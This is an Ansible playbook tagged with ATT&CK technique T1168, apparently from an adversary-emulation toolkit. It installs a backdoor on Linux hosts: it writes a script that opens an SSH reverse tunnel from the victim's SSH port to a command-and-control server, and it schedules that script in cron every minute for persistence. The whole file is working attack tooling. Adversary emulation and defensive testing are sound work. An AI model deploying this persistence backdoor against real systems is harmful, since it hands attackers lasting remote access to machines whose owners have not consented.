# attack_technique: T1168
# victim public key must be added to authorized_host files on c&c
# On c&c run: ssh -pREMLIS localhost
- name: Cron Job
  hosts: linux
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
          - name: createfile
            file: path={{ backdoor_script }} state=touch
          - name: createscript
            shell: |
                echo "sleep 5" >> {{ backdoor_script }}
                echo "REMLIS={{ cnc_port }}" >> {{ backdoor_script }}
                echo "REMUSER={{ cnc_user }}" >> {{ backdoor_script }}
                echo "HOSTS=\"{{ cnc_fqdn }}\"" >> {{ backdoor_script }}
                echo "ssh -R \${REMLIS}:localhost:22 -N \${HOSTS} -l \${REMUSER}" >> {{ backdoor_script }}
                chmod 755 {{ backdoor_script }}
          - name: crontab
            shell: |
                crontab -l > /tmp/crontmp
                echo "* * * * * {{ backdoor_script }}" > {{ crontab_task }} && crontab {{ crontab_task }} 
